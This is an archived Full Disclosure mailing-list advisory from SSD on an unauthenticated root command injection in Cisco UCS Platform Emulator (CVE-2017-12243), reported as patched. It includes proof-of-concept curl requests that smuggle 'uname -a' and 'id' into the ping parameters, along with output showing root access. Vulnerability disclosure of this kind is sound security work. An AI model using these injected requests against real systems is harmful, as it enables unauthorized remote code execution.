+++ to secure your transactions use the Bitcoin Mixer Service +++

 

We need Your Support. Make a Donation now! or Buy Me A Coffee

Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

From: Maor Shwartz <maors () beyondsecurity com>
Date: Wed, 1 Nov 2017 08:15:19 +0200
SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

Full report: https://blogs.securiteam.com/index.php/archives/3362
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD


Vulnerabilities Summary
The following advisory describes two remote code execution vulnerabilities
found in Cisco UCS Platform Emulator version 3.1(2ePE1).

Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled
into a virtual machine (VM). The VM includes software that emulates
hardware communications for the Cisco Unified Computing System (Cisco UCS)
hardware that is configured and managed by Cisco UCS Manager. For example,
you can use Cisco UCS Platform Emulator to create and test a supported
Cisco UCS configuration, or to duplicate an existing Cisco UCS environment
for troubleshooting or development purposes.

The vulnerabilities found in Cisco UCS Platform Emulator are:

Unauthenticated remote code execution
Authenticated remote code execution

Credit
An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
The vendor has released patches to address this vulnerability and issue the
following CVE:

CVE-2017-12243

Vulnerabilities details
Unauthenticated remote code execution
User controlled input is not sufficiently sanitized when passed to
IP/settings/ping function. An unauthenticated attacker can inject commands
via PING_NUM and PING_IP_ADDR parameters. Those commands will run as root
on the remote machine.

Proof of Concept

===

curl "
http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#";

curl -k "
https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#";

curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1";

curl -k "
https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1";

===

By sending one of the above requests the Cisco UCS will response with:

===

/sample output/

================

demo@kali:~/poc$ curl -k "
http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#";

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms


--- 127.0.0.1 ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms

Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686
i686 i386 GNU/Linux


demo@kali:~/poc$ curl "
http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1";

uid=0(root) gid=0(root) groups=0(root)

===




--
Thanks
Maor Shwartz
Beyond Security
GPG Key ID: 93CC36E2DE7FF514

Attachment: SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution – SecuriTeam Blogs.pdf
Description: 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: